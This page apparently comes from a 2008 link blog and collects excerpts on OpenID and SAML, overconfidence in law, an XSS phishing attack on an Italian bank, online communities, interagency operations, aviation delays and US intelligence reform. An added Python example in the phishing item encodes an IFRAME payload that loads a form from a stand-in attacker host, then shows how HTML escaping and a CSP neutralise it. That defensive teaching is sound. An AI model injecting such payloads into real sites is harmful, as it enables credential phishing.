Being "always on" is being always off, to something.
Technical Comparison: OpenID and SAML
Topic: Technology
6:31 am EST, Jan 10, 2008
This document presents a technical comparison of the OpenID Authentication protocol and the Security Assertion Markup Language (SAML) Web Browser SSO Profile and the SAML framework itself. Topics addressed include design centers, terminology, specification set contents and scope, user identifier treatment, web single sign-on profiles, trust, security, identity provider discovery mechanisms, key agreement approaches, as well as message formats and protocol bindings. An executive summary targeting various audiences, and presented from the perspectives of end-users, implementors, and deployers, is provided. We do not attempt to assign relative value between OpenID and SAML, e.g. which is "better"; rather, we attempt to present an objective technical comparison.
Overconfidence is a psychologically-generated distortion of perception consisting of an inflated estimation of one's future success. Because both economics and law usually encourage accurate and calculated estimates of risk, overconfidence is regarded to be detrimental to human judgment and it is denounced as a vice. When an assumption of risk is subsequently realized, the presence of overconfidence is thought to prove that the assumption of risk was ex ante unwarranted.
The main argument of this paper is that overconfidence is underrated. Overconfidence can have constructive value in a variety of situations in which people tend to display a hyperbolic discounting of future utility, which produces in turn inconsistencies in their preferences over time. Intuitively, by artificially raising the estimation of future rewards overconfidence can be instrumental if it offsets the inhibitory effects of exaggerated preference of present rewards. Thus it can produce greater incentive, greater perseverance, resolute performance, and consequently higher achievements. Examples of this effect are found in situations of negotiation, in the improved recovery rate from serious disease and in situations of violent confrontation or wars.
Because overconfidence can lead to positive outcomes, there is at times an incentive to manipulate the facts perceived by the decision maker in order to build up his confidence and increase the efficiency of the decision. These manipulations are a branch of the general theory of non-cooperative games with non-perfect information. We particularly draw attention to internal manipulations, performed by the same player between two points in time, where the former concerns the latter. These manipulations consist in constructive self-deceit and include, inter alia, selective memory, deliberate forgetfulness, and calculated inadvertence. In light of the constructive value of overconfidence, we regard these common mental practices as possibly rational and beneficial.
It follows that under some circumstances, and in particular where the assumption of calculated risk should be encouraged and the chilling effect of over-deterrence should be eschewed, a systematically erroneous assessment of the risk is a key to optimal behavior. Therefore, we criticize the common supposition, according to which an overconfident person should be deemed negligent even if his overconfidence proves useful. We further object to the common view, according to which an intended manipulation of memory should necessarily entail recklessness. For similar reasons, we argue that the law of complicity should acknowledge friendship and love as countervailing the need to combat crime, inasmuch as friendship and love are instrumental to self-esteem.
An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page.
The vulnerable page is served over SSL with a bona fide SSL certificate issued to Banca Fideuram S.p.A. in Italy. Nonetheless, the fraudsters have been able to inject an IFRAME onto the login page which loads a modified login form from a web server hosted in Taiwan.
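The defect the item describes is a reflected cross-site scripting flaw: a value taken from the request URL is written into the login page without HTML encoding, so a crafted link can plant an IFRAME inside a page that otherwise carries the bank's genuine certificate. The following is an added illustration, not code from the article or from the affected site; the host names, the `msg` parameter, and the page template are constructed for the example. It shows the unencoded rendering beside its encoded form, and a check that the encoded version no longer contains a live frame element.

```python
# Added example: reflected XSS on a login page, shown as an unencoded
# template function beside its HTML-encoded form. Hosts, the parameter
# name and the template are hypothetical, constructed for illustration.
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a crafted URL of the kind the item describes, where a
# query parameter is reflected into the login page. Decoded, the "msg" value
# is an <iframe> element pointing at a foreign host.
CRAFTED_URL = (
    "https://bank.example/login?msg="
    "%3Ciframe%20src%3D%22https%3A%2F%2Fattacker.example%2Fform%22%3E%3C%2Fiframe%3E"
)


def reflected_param(url: str, name: str) -> str:
    """Return the percent-decoded value of one query parameter ('' if absent)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def render_unencoded(msg: str) -> str:
    """'Before' form: user input is interpolated straight into the HTML, so any
    markup in the parameter becomes part of the page's DOM."""
    return f'<form action="/login"><p class="notice">{msg}</p>...</form>'


def render_encoded(msg: str) -> str:
    """'After' form: the value is HTML-encoded for an element-content context,
    so '<', '>', '&' and quotes arrive at the browser as inert text."""
    return (
        f'<form action="/login"><p class="notice">'
        f'{html.escape(msg, quote=True)}</p>...</form>'
    )


def contains_active_markup(rendered: str) -> bool:
    """Crude review check: does the rendered page contain an unencoded tag
    capable of loading or running foreign content?"""
    lowered = rendered.lower()
    return any(tag in lowered for tag in ("<iframe", "<script", "<object", "<embed"))


# Defence in depth (assumed values, not the site's real policy): a CSP that
# forbids framing foreign content and restricts where the login form may be
# submitted limits the damage even if one reflection point is missed.
HARDENING_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; frame-src 'none'; form-action 'self'",
}


if __name__ == "__main__":
    value = reflected_param(CRAFTED_URL, "msg")
    print("unencoded page has live frame:", contains_active_markup(render_unencoded(value)))
    print("encoded page has live frame:  ", contains_active_markup(render_encoded(value)))
```

Output encoding must match the context the value lands in (element content here; attribute, URL and JavaScript contexts need different encoders), and the CSP is a backstop rather than a substitute for fixing the reflection itself.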
Online Communities Rot Without Daily Tending By Human Hands
Topic: Technology
8:37 pm EST, Jan 8, 2008
I changed my mind about online community this year.
I still believe that there is no fully automated system capable of managing the complexities of online human interaction — no software fix I know of. But I'd underestimated the power of dedicated human attention.
Plucking one early weed from a bed of germinating seeds changes everything. Small actions by focused participants change the tone of the whole. It is possible to maintain big healthy gardens online. The solution isn't cheap, or easy, or hands-free. Few things of value are.
Normally in an election year, U.S. attention on global affairs dwindles precipitously, allowing other powers to set the agenda. That will not be the case, however, in 2008.
The Inter-agency and Counterinsurgency Warfare: Aligning and Integrating Military and Civilian Roles in Stability, Security, Transition, and Reconstruction Operations
Topic: Politics and Law
8:37 pm EST, Jan 8, 2008
For decades since the formation of the defense establishment under the 1947 National Security Act, all U.S. cabinet departments, national security agencies, and military services involved in providing for the common defense have struggled to overcome differences in policy and strategy formulation, organizational cultures, and even basic terminology. Post-September 11, 2001, international systems, security environments, U.S. military campaigns in Afghanistan and Iraq, and the greater Global War on Terrorism have confronted civilian policymakers and senior military officers with a complex, fluid battlefield which demands kinetic and counterinsurgency capabilities. This monograph addresses the security, stability, transition, and reconstruction missions that place the most pressure on interagency communication and coordination. The results from Kabul to Baghdad reveal that the interagency process is in need of reform and that a more robust effort to integrate and align civilian and military elements is a prerequisite for success.
On December 27, we issued the ninth in a series of our periodic updates to our Aviation Industry Performance Report. The report graphically identifies trends in aviation demand and capacity, aviation system performance, airline finances and service to small communities. This edition of the report focused on the summer of 2007, a time period when aviation delays as well as cancellations reached new highs and airline service captured the attention of the public, Congress, the Secretary of Transportation and the President of the United States. We found that airline on-time performance deteriorated broadly during the summer of 2007. Of the 55 large airports tracked by FAA, the number of delayed flights increased at 51 of the airports and the length of delays increased at 52 airports. Flight arrival delays, during the summer of 2007, increased by 15 percent from summer 2006 levels. In contrast, the number of scheduled flights increased at only 32 of the airports. Additionally, summer 2007 flight cancellations rose 28 percent from last year.
To address the challenges facing the U.S. Intelligence Community in the 21st century, congressional and executive branch initiatives have sought to improve coordination among the different agencies and to encourage better analysis. In December 2004, the Intelligence Reform and Terrorism Prevention Act (P.L. 108-458) was signed, providing for a Director of National Intelligence (DNI) with substantial authorities to manage the national intelligence effort. The legislation also established a separate Director of the Central Intelligence Agency.
Making cooperation effective presents substantial leadership and managerial challenges. The needs of intelligence “consumers” — ranging from the White House to cabinet agencies to military commanders — must all be met, using the same systems and personnel. Intelligence collection systems are expensive and some critics suggest there have been elements of waste and unneeded duplication of effort while some intelligence “targets” have been neglected.
The DNI has substantial statutory authorities to address these issues, but the organizational relationships will remain complex, especially for Defense Department agencies. Members of Congress will be seeking to observe the extent to which effective coordination is accomplished. FY2008 intelligence authorization legislation (H.R. 2082/S. 1538) addresses some of these concerns.
International terrorism, a major threat facing the United States in the 21st century, presents a difficult analytical challenge. Techniques for acquiring and analyzing information on small groups of plotters differ significantly from those used to evaluate the military capabilities of other countries. U.S. intelligence efforts are complicated by unfilled requirements for foreign language expertise. Whether all terrorist surveillance efforts have been consistent with the Foreign Intelligence Surveillance Act of 1978 (FISA) has been a matter of controversy. Changes to FISA are included in H.R. 3773 and S. 2248. S. 2248 was debated by the Senate on December 17, 2007 but further action was postponed until early 2008.
Intelligence on Iraqi weapons of mass destruction was inaccurate and Members have criticized the performance of the Intelligence Community in regard to current conditions in Iraq and other situations. Improved analysis, while difficult to mandate, remains a key goal. Better human intelligence, it is argued, is also essential. Intelligence support to military operations continues to be a major responsibility of intelligence agencies. The use of precision guided munitions depends on accurate, real-time targeting data; integrating intelligence data into military operations will require changes in organizational relationships as well as acquiring necessary technologies.
Counterterrorism requires the close coordination of intelligence and law enforcement agencies, but there remain many institutional and procedural issues that complicate cooperation between the two sets of agencies. This report will be updated as new information becomes available.